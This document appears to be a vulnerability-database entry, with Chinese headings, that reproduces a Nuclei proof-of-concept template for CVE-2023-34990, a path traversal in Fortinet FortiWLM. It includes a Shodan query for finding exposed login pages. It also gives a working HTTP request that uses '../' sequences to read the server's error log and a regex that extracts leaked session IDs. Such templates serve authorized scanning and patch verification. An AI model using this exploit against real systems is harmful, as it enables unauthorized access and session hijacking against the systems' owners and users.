漏洞描述
A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specially crafted web requests.
CVE-2023-34990: FortiWLM - Directory Traversal
PoC代码[已公开]
id: CVE-2023-34990
info:
name: FortiWLM - Directory Traversal
author: DhiyaneshDk
severity: critical
description: |
A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specially crafted web requests.
reference:
- https://fortiguard.com/psirt/FG-IR-23-144
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34990
cwe-id: CWE-94,CWE-23
epss-score: 0.234
epss-percentile: 0.95764
metadata:
max-request: 1
shodan-query: title:"FortiWLM Login"
tags: cve,cve2023,fortiwlm,lfi,cisa
flow: http(1) && http(2)
http:
- raw:
- |
GET /wlm/login?next=/wlm HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
internal: true
dsl:
- 'status_code == 200'
- 'contains(body, "<title>FortiWLM Login</title>")'
condition: and
- raw:
- |
GET /ems/cgi-bin/ezrf_lighttpd.cgi?op_type=upgradelogs&imagename=../../../../../../../../../data/apps/nms/logs/httpd_error_log HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: response
regex:
- 'sessionid=([A-F0-9]+)'
- type: status
status:
- 200
# digest: 490a004630440220310f37a968d567e7063c748f11a928a677665bacfe28971971dd63ecfd6eb15702205dbf9a90a7d929563ad0e64f820d3fffb080411dd9694a332af98340b13bc366:922c64590222798bb761d5b6d8e72950